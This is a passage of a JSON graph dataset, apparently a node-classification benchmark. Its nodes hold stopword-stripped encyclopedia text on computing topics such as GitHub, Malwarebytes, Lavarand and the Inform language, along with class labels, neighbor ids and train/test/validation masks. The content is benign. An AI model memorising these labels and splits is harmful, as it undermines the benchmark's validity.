      4840,
      9454,
      10991,
      4341,
      5880,
      6910,
      11009,
      6414,
      10510,
      11555,
      3876,
      303,
      9008,
      8502,
      7479,
      10043,
      7487,
      3904,
      1349,
      10568,
      5961,
      10569,
      8524,
      847,
      10581,
      2903,
      10586,
      11610,
      2399,
      4960,
      8545,
      10083,
      8549,
      6502,
      10089,
      8554,
      10097,
      9078,
      3960,
      6016,
      3462,
      4486,
      4998,
      6536,
      8582,
      1931,
      5521,
      8082,
      1435,
      4507,
      6558,
      10143,
      7076,
      5031,
      428,
      8628,
      5048,
      10680,
      6074,
      10684,
      963,
      8644,
      11212,
      11218,
      5588,
      10198,
      2519,
      4057,
      5081,
      477,
      4069,
      3051,
      7147,
      6640,
      10739,
      1016,
      3577,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11220,
    "label": 1,
    "text": "Metadata_repository:metadata repository metadata repository database created store metadata metadata information structures contain actual data metadata often said data data misleading data profiles example actual data data metadata one layer abstraction removed – data structures contain data metadata may describe structure data subject stored format well-designed metadata repository typically contains data far beyond simple definitions various data structures typical repositories store dozens hundreds separate pieces information data structure comparing metadata couple data items one digital one physical help one understand metadata really first digital data stored database one may table called patient many columns containing data describes different attribute patient one columns may named patient_last_name metadata column contains actual surnames patients database already used two items name column contains data patient_last_name name table contains column patient metadata might include maximum length last name may entered whether last name required patient without patient_last_name whether database converts surnames entered lower case upper case metadata security nature may show restrictions limit may view names second physical data stored brick mortar library one many volumes may various media including books metadata books would include isbn binding_type page_count author etc within binding_type metadata would include possible bindings material etc contextual information business data include meaning content policies govern technical attributes specifications transform programs manipulate metadata repository responsible physically storing cataloging metadata data metadata repository generic integrated current historical generic meta model store metadata generic terms instead storing applications-specific defined way data base standard changes one product another physical meta model metadata repository would need change integration metadata repository allows business areas metadata integrated fashion covering domains subject areas organization metadata repository accessible current historical metadata metadata repositories used referred data dictionary transition needs metadata usage business intelligence increased scope metadata repository increased earlier data dictionaries closest place interact technology business data dictionaries universe metadata repository initial stages scope increased business glossary tags variety status flags emerged business side consumption technology metadata lineage linkages made repository source valuable reports bring business technology together helped data management decisions easier well assess cost changes metadata repository explores enterprise wide data governance data quality master data management includes master data reference data integrates wealth information integrated metadata across organization provide decision support system data structures even though reflects structures consumed various systems repository additional functionalities compared registry metadata repository stores metadata like metadata registry also adds relationships related metadata types metadata related flow point entry organization deliverables considered lineage data point metadata related across related metadata types called linkages providing relationships metadata points across organization maintaining integrity architecture handle changes metadata repository provides basic material understanding complete data flow definitions impact also important feature maintain version control though statement contrasting open discussion definitions still evolving accuracy definitions needs refinement purpose registry define metadata element maintained across organization data models data management teams refers registry changes follow metadata repository sources metadata various metadata systems organizations reflects upstream repository never acts upstream registry used upstream metadata changes metadata repository enables structure organizations data containers one integrated place opens plethora resourceful information making calculated business decisions tool uses one generic form data model integrate models thus brings applications programs organization one format top applying business definitions business processes brings business technology closer help organizations make reliable roadmaps definite goals one stop information business control changes impact analysis tool usually business spends lots time money make decisions based discovery research impacts make changes add new data structures remove structures data management organization structured well maintained repository moving product ideation delivery takes least amount time considering variables constant sum database management system dbms database tools language metadata components within database applications already repositories registries expected provide necessary functionality access data stored within vendors want companies capable easily migrating data away products competitors products proprietary way handle metadata case tools dbms dictionaries etl tools data cleansing tools olap tools data mining tools handle store metadata differently metadata repository designed store metadata components tools metadata repositories store metadata four classifications ownership descriptive characteristics rules policies physical characteristics ownership showing data owner application owner descriptive characteristics define names types lengths definitions describing business data business processes rules policies define security data cleanliness timelines data relationships physical characteristics define origin source physical location like building logical data model creating database logical meta model help identify metadata requirements business data metadata repository centralized decentralized distributed centralized design means one database metadata repository stores metadata applications business wide centralized metadata repository advantages disadvantages centralized database easier manage data one database disadvantage bottlenecks may occur decentralized metadata repository stores metadata multiple databases either separated location departments business makes management repository involved centralized metadata repository advantage metadata broken individual departments distributed metadata repository uses decentralized method unlike decentralized metadata repository metadata remains original application xml gateway created acts directory accessing metadata within different application advantages disadvantages distributed metadata repository mirror distributed database design information model include various layers metadata types overlapped create integrated view data various metadata types stitched related metadata elements top model linking business glossary layers metadata metadata repositories designed either entity-relationship model object-oriented design",
    "neighbors": [
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11221,
    "label": 7,
    "text": "GitHub:github github american company provides hosting software development version control using git subsidiary microsoft acquired company 2018 7.5 billion offers distributed version control source code management scm functionality git well adding features provides access control several collaboration features bug tracking feature requests task management wikis every project github offers plans free professional enterprise accounts free github accounts commonly used host open source projects january 2019 github offers unlimited private repositories plans including free accounts may 2019 github reports 37 million users 100 million repositories including least 28 million public repositories making largest host source code world github developed chris wanstrath p. j. hyett tom preston-werner scott chacon using ruby rails started february 2008 company github inc. existed since 2007 located san francisco february 24 2009 github team members announced talk yahoo headquarters within first year online github accumulated 46,000 public repositories 17,000 formed previous month alone time 6,200 repositories forked least 4,600 merged july 5 2009 github announced site harnessed 100,000 users july 27 2009 another talk delivered yahoo preston-werner announced github grown host 90,000 unique public repositories 12,000 forked least total 135,000 repositories july 25 2010 github announced hosting 1 million repositories april 20 2011 github announced hosting 2 million repositories june 2 2011 readwriteweb reported github surpassed sourceforge google code total number commits period january may 2011 july 9 2012 peter levine general partner github investor andreessen horowitz stated github growing revenue 300 annually since 2008 profitably nearly entire way january 16 2013 github announced passed 3 million users mark hosting 5 million repositories december 23 2013 github announced reached 10 million repositories june 2015 github opened office japan first office outside u.s. july 29 2015 github announced raised 250 million funding round led sequoia capital round valued company approximately 2 billion 2016 github ranked 14 forbes cloud 100 list february 28 2018 github fell victim second largest distributed denial-of-service ddos attack history incoming traffic reaching peak 1.35 terabits per second june 4 2018 microsoft announced reached agreement acquire github 7.5 billion purchase closed october 26 2018 june 19 2018 github expanded github education offering free education bundles schools june 4 2018 microsoft announced intent acquire github us 7.5 billion deal closed oct. 26 2018 github continue operate independently community platform business microsoft service led xamarin nat friedman reporting scott guthrie executive vice president microsoft cloud ai current ceo chris wanstrath retained technical fellow also reporting guthrie microsoft become significant user github using host open source projects development tools chakra core powershell visual studio code backed open source projects linux developed virtual file system git vfs git formerly git virtual file system gvfs —a git extension managing large-scale repositories adopted github concerns developers kyle simpson javascript trainer author rafael laguna ceo open-xchange microsoft purchase citing uneasiness microsoft handling previous acquisitions nokia mobile business skype saw culmination microsoft recent changes business strategy ceo satya nadella seen larger focus sale cloud computing services main line business alongside development contributions open source software linux opposed microsoft windows operating system harvard business review argued microsoft intending acquire github get access userbase used loss leader encourage use development products services concerns sale bolstered interest competitors bitbucket owned atlassian gitlab commercial open source product also runs hosted service version sourceforge owned bizx llc reported seen spikes new users intending migrate projects github respective services github inc. originally flat organization middle managers words everyone manager self-management employees could choose work projects interested open allocation salaries set chief executive 2014 github inc. introduced layer middle management github.com start-up business first years provided enough revenue funded solely three founders start taking employees july 2012 four years company founded andreessen horowitz invested 100 million venture capital july 2015 github raised another 250 million venture capital series b round investors sequoia capital andreessen horowitz thrive capital venture capital funds august 2016 github making 140 million annual recurring revenue github mascot anthropomorphized octocat five octopus-like arms character created graphic designer simon oxley clip art sell istock website enables designers market royalty-free digital images github became interested oxley work twitter selected bird designed logo illustration github chose character oxley named octopuss since github wanted octopuss logo use istock license disallows negotiated oxley buy exclusive rights image github renamed octopuss octocat trademarked character along new name later github hired illustrator cameron mcefee adapt octocat different purposes website promotional materials mcefee various github users since created hundreds variations character available octodex march 2014 github programmer julie ann horvath alleged founder ceo tom preston-werner wife theresa engaged pattern harassment led leaving company april 2014 github released statement denying horvath allegations however following internal investigation github confirmed claims github ceo chris wanstrath wrote company blog investigation found tom preston-werner capacity github ceo acted inappropriately including confrontational conduct disregard workplace complaints insensitivity impact spouse presence workplace failure enforce agreement spouse work office preston-werner resigned company 2017 allegations made discriminatory unsupportive behavior github developer recruited following commitment github improve diversity inclusivity development github platform began october 19 2007 site launched april 2008 tom preston-werner chris wanstrath p. j. hyett scott chacon made available months prior beta release projects github accessed manipulated using standard git command-line interface standard git commands work github also allows registered non-registered users browse public repositories site multiple desktop clients git plugins also created github third parties integrate platform site provides social networking-like functions feeds followers wikis using wiki software called gollum social network graph display developers work versions forks repository fork branch within fork newest user must create account order contribute content site public repositories browsed downloaded anyone registered user account users able discussions manage repositories submit contributions others repositories review changes code github began offering unlimited private repositories cost january 2019 limited three contributors per project previously public repositories free fundamental software underpins github git written linus torvalds creator linux additional software provides github user interface written using ruby rails erlang github inc. developers wanstrath hyett preston-werner github mostly used code addition source code github supports following formats features github terms service require public software projects hosted github meet open source definition reason essential users developers intending use piece software found github read software license repository usually found top-level file called license license.txt similar determine meets needs terms service state setting repositories viewed publicly agree allow others view fork repositories github enterprise similar github public service designed use large-scale enterprise software development teams enterprise wishes host repositories behind corporate firewall cloud enterprises privately run github cloud premises two environments linked work together github pages static web hosting service offered github since 2008 github users hosting user blogs project documentation even whole books created page github pages content stored git repository either files served visitors verbatim markdown format github seamlessly integrated jekyll static web site blog generator github continuous integration pipelines time content source updated jekyll regenerates website automatically serves via github pages infrastructure rest github includes free paid tiers service instead supported web advertising web sites generated service hosted either subdomains github.io domain custom domains bought third-party domain name registrar github also operates services pastebin-style site called gist hosting code snippets github proper hosting larger projects tom preston-werner presented then-new gist feature punk rock ruby conference 2008 gist builds traditional simple concept pastebin adding version control code snippets easy forking ssl encryption private pastes gist git repository multiple code snippets contained single paste pushed pulled using git forked code pushed back original author form patch gists pastes become like mini-projects github launched new program called github student developer pack give students free access popular development tools services github partnered bitnami crowdflower digitalocean dnsimple hackhands namecheap orchestrate screenhero sendgrid stripe travis ci unreal engine launch program 2016 github announced launch github campus experts program train encourage students grow technology communities universities campus experts program open university students 18 years older across world github campus experts one primary ways github funds student oriented events communities campus experts given access training funding additional resources run events grow communities become campus expert applicants must complete online training course consisting multiple modules designed grow community leadership skills github also provides software service integrations adding extra features projects services include site https //github.community/ github maintains community forum users ask questions publicly answer questions users site https //github.com/sponsors github sponsors allows users make monthly money donations projects hosted github public beta announced may 23 2019 currently project accepts wait list registrations verge said github sponsors works exactly like patreon developers offer various funding tiers come different perks ’ receive recurring payments supporters want access encourage work except zero fees use program furthermore github offer incentives early adopters first year pledges cover payment processing costs match sponsorship payments 5,000 per developer furthermore users still use similar services like patreon open collective link websites july 25th 2019 developer based iran wrote medium github blocked private repositories prohibited access github pages soon github confirmed blocking developers iran crimea cuba north korea syria accessing private repositories however github reopened access github pages days later public repositories regardless location also revealed using github visiting sanctioned countries could result similar action occurring user account github responded complaints media spokesperson saying github subject us trade control laws committed full compliance applicable law time github vision global platform developer collaboration matter developers reside result take seriously responsibility examine government mandates thoroughly certain users customers impacted beyond required law includes keeping public repositories services including open source projects available accessible support personal communications involving developers sanctioned regions developers feel restrictions appeal removal said restrictions including travel reside countries github forbidden use vpns ip proxies access site sanctioned countries purchase history ip addresses flag users among sources december 3 2014 github blacklisted russia github initially refused take user-posted suicide manuals day russia withdrew block december 31 2014 github blocked india along 31 websites pro-isis content posted users january 10 2015 github unblocked march 26 2015 github fell victim massive ddos attack lasted 118 hours attack appeared originate china primarily targeted github-hosted user content describing methods circumventing internet censorship october 8 2016 github access blocked turkish government prevent email leakage hacked account belonging country energy minister july 25 2019 github started blocking developers countries facing us trading sanctions prominent open source organizations projects use github primary place collaboration including",
    "neighbors": [
      6150,
      2058,
      6154,
      6156,
      10250,
      10258,
      19,
      8217,
      8225,
      8226,
      6191,
      2098,
      10290,
      2105,
      58,
      10298,
      2108,
      6209,
      4171,
      4194,
      10338,
      4200,
      10345,
      10353,
      6265,
      4231,
      2186,
      142,
      2191,
      10394,
      10405,
      2224,
      2228,
      10422,
      4282,
      6331,
      10428,
      4289,
      194,
      6345,
      10447,
      6352,
      219,
      4318,
      10463,
      4326,
      10470,
      8424,
      2281,
      10478,
      2292,
      8445,
      259,
      4356,
      10520,
      2335,
      295,
      6441,
      10557,
      8515,
      331,
      6476,
      4439,
      8539,
      10587,
      2397,
      2401,
      8549,
      8554,
      364,
      8568,
      6523,
      10622,
      6533,
      394,
      10646,
      8605,
      418,
      2474,
      10670,
      4536,
      2494,
      6591,
      8644,
      462,
      10705,
      467,
      10712,
      8681,
      8691,
      10739,
      4607,
      8720,
      4628,
      8728,
      8735,
      8757,
      6718,
      8770,
      581,
      6731,
      2636,
      8779,
      4704,
      2660,
      2661,
      617,
      2670,
      4725,
      633,
      8825,
      2684,
      8830,
      4746,
      6797,
      8846,
      10897,
      10900,
      2709,
      6810,
      4772,
      2730,
      6827,
      2737,
      6851,
      708,
      6853,
      10950,
      711,
      8907,
      10957,
      4814,
      4816,
      8924,
      735,
      740,
      8941,
      10991,
      6900,
      762,
      8965,
      782,
      4883,
      788,
      11030,
      8994,
      8998,
      817,
      11060,
      823,
      9016,
      6979,
      9033,
      4943,
      2910,
      4958,
      11103,
      2919,
      875,
      11115,
      7022,
      9078,
      912,
      5008,
      9117,
      929,
      2978,
      7077,
      11191,
      961,
      9166,
      11215,
      3034,
      7139,
      3052,
      1007,
      5123,
      11269,
      9223,
      5130,
      3087,
      11287,
      9245,
      1054,
      3102,
      5165,
      7215,
      3120,
      5170,
      7219,
      1087,
      9297,
      9320,
      7292,
      9343,
      11396,
      5255,
      11410,
      3223,
      3224,
      7329,
      5283,
      7347,
      11449,
      1211,
      7359,
      7361,
      5314,
      5315,
      3274,
      5323,
      9437,
      11492,
      1255,
      9448,
      9454,
      9464,
      11524,
      11549,
      5408,
      5409,
      7456,
      11552,
      11559,
      11570,
      7487,
      3393,
      9544,
      11603,
      1365,
      11605,
      11606,
      9562,
      7516,
      1379,
      1390,
      5489,
      7537,
      9585,
      1396,
      7545,
      11641,
      11652,
      3462,
      11659,
      9614,
      1429,
      1435,
      3485,
      1445,
      11689,
      3499,
      7601,
      3506,
      5560,
      1470,
      3527,
      5578,
      7628,
      9688,
      1498,
      3553,
      7684,
      9732,
      9741,
      3605,
      9749,
      7708,
      1568,
      5666,
      1574,
      3625,
      5677,
      5697,
      5708,
      9812,
      9839,
      9842,
      7796,
      5749,
      3705,
      3713,
      3717,
      3734,
      5785,
      1692,
      7838,
      3746,
      3762,
      5813,
      5819,
      3777,
      5833,
      5834,
      9931,
      7885,
      3793,
      7889,
      9940,
      9944,
      3807,
      9957,
      3821,
      3834,
      1789,
      9981,
      7941,
      3853,
      3867,
      3869,
      5920,
      7970,
      3875,
      3876,
      1832,
      3881,
      10032,
      3889,
      3890,
      10033,
      5952,
      1860,
      10059,
      5964,
      3918,
      3939,
      8039,
      8041,
      3959,
      1916,
      10110,
      6016,
      3969,
      6018,
      8068,
      8076,
      1935,
      4001,
      10151,
      1970,
      4032,
      4033,
      4040,
      8139,
      2000,
      4048,
      2003,
      4051,
      6103,
      6104,
      8153,
      8157,
      8164,
      6134
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11222,
    "label": 3,
    "text": "Lavarand:lavarand lavarand hardware random number generator designed silicon graphics worked taking pictures patterns made floating material lava lamps extracting random data pictures using result seed pseudorandom number generator although secondary part random number generation uses pseudorandom number generator full process essentially qualifies true random number generator due random seed used however applicability limited low bandwidth covered titled method seeding pseudo-random number generator cryptographic hash digitization chaotic system 1997 2001 web site lavarand.sgi.com demonstrating technique landon curt noll one originators went help develop lavarnd use lava lamps despite short life lavarand.sgi.com often cited example online random number source 2017 cloudflare maintains similar system lava lamps securing approximately 10 internet traffic",
    "neighbors": [
      10051,
      8956
    ],
    "mask": "Test"
  },
  {
    "node_id": 11223,
    "label": 5,
    "text": "Tasman_(layout_engine):tasman layout engine tasman discontinued browser engine developed microsoft inclusion macintosh version internet explorer 5 tasman attempt improve support web standards defined world wide web consortium time release tasman seen layout engine best support web standards html css internet explorer mac longer supported newer versions tasman incorporated microsoft products tantek çelik led software team developed tasman engine tasman later became used layout engine msn mac os x office 2004 mac first version tasman referred v0 released internet explorer 5 macintosh edition march 27 2000 upgraded version version 0.1 followed release internet explorer 5.1 mac may 15 2003 microsoft released subscription-only msn mac os x browser used upgraded version tasman version 0.9 layout engine posting mac internet explorer talk list internet explorer mac program manager jimmy grewal listed improvements tasman improved part number tv set-top box projects microsoft reaching version 1.0 tasman engine used microsoft tv mediaroom edition may 11 2004 microsoft started shipping microsoft office 2004 mac incorporates version tasman layout engine email client entourage since microsoft office mac 2011 entourage replaced macintosh version microsoft outlook uses webkit-based layout engine used safari instead",
    "neighbors": [
      5765,
      9609,
      6028,
      7951,
      790,
      6171,
      417,
      7713,
      11683,
      10026,
      10282,
      7346,
      11060,
      10808,
      3790,
      3407,
      4048,
      9167,
      9808,
      8281,
      2777,
      603,
      8923,
      487,
      5101,
      9328,
      2676,
      4728,
      124
    ],
    "mask": "Train"
  },
  {
    "node_id": 11224,
    "label": 4,
    "text": "Telecom_network_protocol_analyzer:telecom network protocol analyzer telecom network protocol analyzer protocol analyzer analyze switching signaling telecommunication protocol different nodes pstn mobile telephone networks 2g 3g gsm networks cdma networks wimax mobile telecommunication network analyze traffic msc bsc bsc bts msc hlr msc vlr vlr hlr protocol analyzers mainly used performance measurement troubleshooting devices connect network calculate key performance indicators monitor network speed-up troubleshooting activities",
    "neighbors": [
      9440
    ],
    "mask": "Test"
  },
  {
    "node_id": 11225,
    "label": 4,
    "text": "Malwarebytes:malwarebytes malwarebytes inc. american internet security company offices santa clara california clearwater florida tallinn estonia cork ireland specializes protecting home computers smartphones companies malwarebytes formally established january 2008 marcin kleczynski bruce harrison ceo vice president research malwarebytes respectively though origins company date back 2004 kleczynski became involved forums discussing computer viruses 2011 malwarebytes acquired hphosts website blacklisting company tracks blacklisted websites ad servers june 2015 company announced moving headquarters 10 almaden boulevard san jose california new office space two top floors 12-story 3979 freedom circle santa clara company reported growth 10 million users one year 2014–2015 increase revenue 1653 2014 2015 malwarebytes fixed 250 million computers five billion malware threats worldwide several malwarebytes products become well known computer world malwarebytes anti-malware available two different versions one free download home computers professional version 14-day free trial advance malwarebytes anti-exploit uses exploit mitigation protect vulnerable programs attack endpoint security advanced anti-ransomware technology package unveiled january 2016 three products incorporated single program called malwarebytes 3.0 premium paid program 14-day free trial period malwarebytes anti-exploit longer available free standalone product malwarebytes inc. informally established 2004 ceo founder marcin kleczynski originally poland still teenager attending high school bensenville illinois time working technician computer repair shop chicago noticed whenever infected computers arrived would generally reformat computer regardless infection minor mother computer became infected kleczynski learned virus n't directly attacked finding neither mcafee symantec would remove malware system later recalled 've never angry got computer infected professed mother told fix penalty death kleczynski posted forum spywareinfo popular time able learn cure took three days company unofficially founded kleczynski conversed became friends several editors forum tempted buy unused domain one site regulars bruce harrison kleczynski wrote inaugural version company software 2006 worked college roommate produce freely available program called rogueremover utility specialized fighting type infection known rogues scam computer users giving away credit card information fake anti-virus software rogueremover proved instrumental developing malwarebytes anti-malware kleczynski able set forum enabled improve software feedback kleczynski harrison formally launched malwarebytes january 21 2008 kleczynski studying computer science university illinois bruce became vp research malwarebytes hired doug swanson experience freeware development work new company marcus chung e-commerce expert formerly worked greenborder hired chief operating officer kleczynski harrison reportedly made 600,000 first year selling software despite met personally time 2011 malwarebytes acquired hphosts website blacklisting company tracks blacklisted websites ad servers necessary development protect new internet protocol addresses web servers distribute malware advise internet service providers shut malicious activity year company claimed removed five billion pieces malware three years following year company launched corporate market enterprise product aimed desktop-based anti-malware detection protection 2013 malwarebytes acquired zerovulnerabilitylabs inc. security research development company founded pedro bustamante protects software applications known zero-day exploits used exploit kits web-based vulnerability exploits corporate-targeted attacks expanded malware removal protection android platform launch malwarebytes anti-malware mobile launched usb-based product called malwarebytes techbench aimed helping technicians remove malware 2014 malwarebytes received 30 million funding highland capital following year announced treated 250 million computers worldwide representing 20–25 working business computers 2013 claimed removed five billion malware threats computers first five years june 2015 company announced moving headquarters 10 almaden boulevard san jose california new office space two top floors 12-story 3979 freedom circle santa clara california new office twice size former office company reported growth 10 million users one year 25 35 million active users time increase revenue 1653 2014 2015 kleczynski named one forbes magazine '30 30 january 2016 malwarebytes unveiled advanced anti-ransomware package endpoint security announced raised 50 million investment fidelity management research company kleczynski stated funds would used primarily company hiring product development marketing assets june malwarebytes announced strong growth sales 75 percent first quarter year compared 2015 billings surpassing 100 million corporate subscription base company reported grown 90 september proofpoint inc. ceo gary steele joined company board directors kleczynski citing deep expertise security software industry proven ability increasing sales revenue main reasons appointment october company purchased adwcleaner windows program used clean adware computers february 2017 company acquired saferbytes italian security start-up specialized anti-malware anti-exploit anti-rootkit cloud av sandbox technologies december 2016 malwarebytes anti-malware updated built ground combined 3 flagship products anti-malware anti-exploit anti-ransomware renamed malwarebytes anti-malware malwarebytes malwarebytes also functions anti-virus according release statement ceo marcin kleczynski states malwarebytes engine advantage many traditional antivirus programs developed 2008 many others developed late 1990s little idea malware would look like 15 years line states makes easier us adapt malware evolves new york times describes system hybrid heuristics behavior signature engine designed detect block malware vendors ca n't detect according dean takahashi venturebeat malwarebytes complements antivirus software vendors symantec mcafee anti-malware working anti-virus software attack problem different directions remarked malwarebytes cleans machines already infected pro version stops machine getting infected first place early development days rogueremover malwarebytes thrives community feedback runs two sub-forums complementing main forum known false positives malware contribution false positives reported allowing company update database within hours malware contribution allowing quickly report missing download kleczynski quoted saying still try work like bootstrapped company 'd rather build products customers buy rather sell something may need. ” malwarebytes several products 2011 available 36 different languages malwarebytes anti-malware offers two different versions one free download home computers professional version 14-day free trial advance offering real-time protection malware automated scanning automatic updating malwarebytes anti-malware mobile free android app protects smartphones mobile malware preventing unauthorized access personal data identifying tracking applications rating 4.4 google play store 2014 company launched malwarebytes anti-malware 2.0 improved user interface dashboard 2014 company launched malwarebytes anti-exploit shields selected applications attacks exploit mitigation protect vulnerable programs anti-exploit also comes free paid version windows computers free version stops exploits browsers java whilst paid product adds protection wider range software applications anti-exploit received four stars pc magazine v3 magazine security innovation year award 2016 malwarebytes anti-exploit merged premium version malwarebytes version 3.0 standalone application offered perpetual beta july 2015 malwarebytes acquired adwaremedic released malwarebytes anti-malware mac detects malware adware potentially unwanted programs macintosh computers january 2016 malwarebytes unveiled malwarebytes endpoint security advanced anti-ransomware technology described first solution offer multiple layers protection unknown ransomware company sponsored survey osterman research 540 firms united states united kingdom canada germany found nearly 40 companies experienced ransomeware incidents 34 percent accounted loss revenue guardian reported one-fifth british companies charged 10,000 unlock files increasing demand anti-ransomeware technology endpoint inception beta reportedly downloaded 200,000 businesses consumers first six months year malwarebytes also numerous tools junkware removal tool remove adware anti-rootkit beta remove repair rootkits startuplite boost speed windows reboot fileassassin prevent locked files software license requires arbitration county reside forbids class action suits reverse engineering sharing limits warranties liability even free version may shared since track use separately user malwarebyte privacy policy lists many types information collect store including software running user computer programs installed use malwarebytes says collect name email address mailing address phone number ... company name company size business type ... internet protocol ip addresses browser type internet service provider isp referring/exit pages files viewed site ... operating system date/time stamp and/or clickstream data ... type device use operating system version unique device identifier ... language ... 32- 64-bit ... information windows security/action center including security settings programs installed use ... license ... represents console system number seats managed installation console endpoint domain information ... organization ip address licensed different limits use sale sharing data general put time limits long keep data except ip address users ask deletion pii text says save locations ip addresses including mobile devices go get gps locations mobile devices ask access track location based information mobile device time downloading using mobile apps services say get antenna locations also collect detailed information malware exploits find tied user license number device identifier vendor ... file path exploit process ... command-line arguments passed exploit ... potentially copy exploit executable list license number pii certificate truste among things certifies company limits information collected limits use specified privacy notice 2018 key individuals working malwarebytes included",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3595,
      3981,
      10637,
      9488,
      3473,
      9341,
      4374,
      1052,
      156,
      6431,
      8735,
      2721,
      9121,
      9375,
      5924,
      37,
      550,
      679,
      1318,
      2601,
      2213,
      2859,
      3243,
      6699,
      6823,
      5935,
      8615,
      9771,
      6834,
      4403,
      4659,
      9523,
      10166,
      11198,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      8614,
      10574,
      10708,
      2005,
      8024,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      6241,
      9569,
      11622,
      877,
      6382,
      10221,
      4464,
      9713,
      3955,
      6643,
      10872,
      8061,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 11226,
    "label": 9,
    "text": "Fexpr:fexpr lisp programming languages fexpr function whose operands passed without evaluated fexpr called body fexpr evaluated evaluations take place except explicitly initiated fexpr contrast ordinary lisp function called operands evaluated automatically results evaluations provided function traditional lisp macro called operands passed unevaluated whatever result macro function returns automatically evaluated early lisp environment mapped symbol association list rather directly value standard keys lists included two keys used store data value looked symbol occurred argument four keys used store function looked symbol occurred operator function keys indicated compiled ordinary function whose operands evaluated passed indicated compiled special form whose operands passed unevaluated indicated user-defined ordinary function indicated user-defined special form difference fexpr expr whether operands automatically evaluated strict original usage fexpr therefore user-defined function whose operands passed unevaluated however later usage term fexpr may describe first-class function whose operands passed unevaluated regardless whether function primitive user-defined simple illustration fexprs work fexpr definition written kernel programming language similar scheme convention kernel names fexprs always start definition provides fexpr called takes three operands fexpr called local environment created extending static environment fexpr defined local bindings created symbols bound three operands call fexpr symbol bound dynamic environment fexpr called body fexpr ... evaluated local environment result evaluation becomes result call fexpr net effect first operand evaluated dynamic environment depending whether result evaluation non-negative either second third operand evaluated result returned operand either third second evaluated example statically scoped local environment extension static environment 1980 lisp languages supported fexprs mainly dynamically scoped local environment extension dynamic environment rather static environment however still sometimes necessary provide local name dynamic environment avoid capturing local parameter names fexpr support continued lisp 1.5 last substantially standard dialect lisp fragmented multiple languages 1970s two dominant lisp languages — maclisp interlisp — supported fexprs 1980 conference lisp functional programming kent pitman presented paper special forms lisp discussed advantages disadvantages macros fexprs ultimately condemned fexprs central objection lisp dialect allows fexprs static analysis determine generally whether operator represents ordinary function fexpr — therefore static analysis determine whether operands evaluated particular compiler tell whether subexpression safely optimized since subexpression might treated unevaluated data run-time since decline maclisp interlisp two lisp languages risen dominance 1993 — scheme common lisp — support fexprs newlisp support fexprs calls macros picolisp built-in functions fsubrs lisp-level functions exprs fexprs lexprs mixture starting brian smith 3-lisp 1982 several experimental lisp dialects devised explore limits computational reflection support reflection lisps support procedures reify various data structures related call — including unevaluated operands call makes procedures fexprs late 1990s fexprs become associated primarily computational reflection theoretical results fexprs obtained 1993 john c. mitchell used lisp fexprs example programming language whose source expressions formally abstract concrete syntax source expression always extracted context operand fexpr 1998 mitchell wand showed adding fexpr device lambda calculus — device suppresses rewriting operands — produces formal system trivial equational theory rendering impossible make source-to-source optimizations without whole-program analysis 2007 john n. shutt proposed extension lambda calculus would model fexprs without suppressing rewriting operands attempt avoid wand result following languages implement fexprs near equivalents",
    "neighbors": [
      7392,
      10083,
      11269,
      6502,
      4839,
      5033,
      5833,
      205,
      2062,
      3119,
      3408,
      2577,
      9454,
      10510,
      10198,
      5783,
      4799
    ],
    "mask": "Test"
  },
  {
    "node_id": 11227,
    "label": 9,
    "text": "TADS:tads text adventure development system tads prototype-based domain-specific programming language set standard libraries creating interactive fiction games original tads 1 released high energy software shareware 1988 followed tads 2 long early 1990s tads established number one development tool interactive fiction place simpler systems like agt adventure game toolkit late 1990s joined inform popular interactive fiction development language tads 2 syntax based c bits pascal tads 2 maintained updated regular intervals creator michael j. roberts even became freeware july 1996 graham nelson creator inform describes inform tads two systems ... widely used last half 1990s tads called second commonly used programming language today multimedia tads introduced 1998 allows games display graphics animation play sounds platform supports 2006 tads received major overhaul release tads 3 complete rewrite tads engine retaining platform-dependent code ease porting tads 3 uses language syntax resembles c++ java many new features efficient dynamic objects automatic garbage collection structured exceptions native utf-8 strings many useful function classes tads 3 compiler interpreter ported dos macintosh unix platforms several tads 3 games released games written tads compiled platform-independent format played computer suitable virtual machine vm exists virtual machines exist several platforms respect tads closely follows example original infocom z-machine well modern languages java c whereas tads 1 2 vms parse commands entered player sending results game tads 3 employs general-purpose virtual machine command-parsing done game code akin inform rationale easier customize parser",
    "neighbors": [
      1952,
      2304,
      9345,
      8262,
      9926,
      8524,
      5677,
      6797,
      5053,
      7983,
      9714,
      9875,
      5492,
      823,
      11228,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11228,
    "label": 9,
    "text": "Inform:inform inform programming language design system interactive fiction originally created 1993 graham nelson inform generate programs designed z-code glulx virtual machines versions 1 5 released 1993 1996 around 1996 nelson rewrote inform first principles create version 6 inform 6 following decade version 6 became reasonably stable popular language writing interactive fiction 2006 nelson released inform 7 briefly known natural inform completely new language based principles natural language new set tools based around book-publishing metaphor versions inform generate files z-code also called story files source code files run z-code interpreter – program properly implements z-code virtual machine z-machine specification z-machine originally developed infocom 1979 interactive fiction titles least one interpreter nearly every major minor platform means z-code file run multitude platforms alterations andrew plotkin created unofficial version inform 6 also capable generating files glulx virtual machine designed overcome many limitations several-decades-old z-machine starting inform 6.3 released february 29 2004 inform 6 included official support virtual machines based andrew plotkin work early release inform 7 support glulx august 2006 glulx support released inform originally created graham nelson 1993 1996 nelson rewrote inform first principles create version 6 inform 6 following decade version 6 became reasonably stable popular language writing interactive fiction inform 6 system consists two major components inform compiler generates story files inform source code inform library suite software handles difficult work parsing player text input keeping track world model name inform also refers inform programming language compiler understands although inform 6 z-machine originally designed interactive fiction mind many programs developed including basic interpreter lisp tutorial complete interpreter tetris game version game snake inform compiler generates files z-machine glulx also called story files inform 6 source code inform programming language object-oriented procedural key element language objects objects maintained object tree lists parent–child relationships objects since parent–child relationship often used represent location object parent another object often said hold objects moved throughout tree typically top level objects represent rooms locations within game may hold objects representing room contents physical items non-player characters player character background effects objects hold objects codice_1 object might hold codice_2 object holding codice_3 object contains codice_4 object early versions inform objects different notion objects object-oriented programming thing class later versions added support class definitions allowed objects members classes objects classes inherit multiple classes interactive fiction games typically contain many unique objects many objects inform inherit class metaclass object however objects frequently attributes boolean properties codice_5 codice_6 recognized inform library languages would normally implemented via inheritance simple example inform 6 source code inform system also contains inform library automates nearly difficult work involved programming interactive fiction specifically 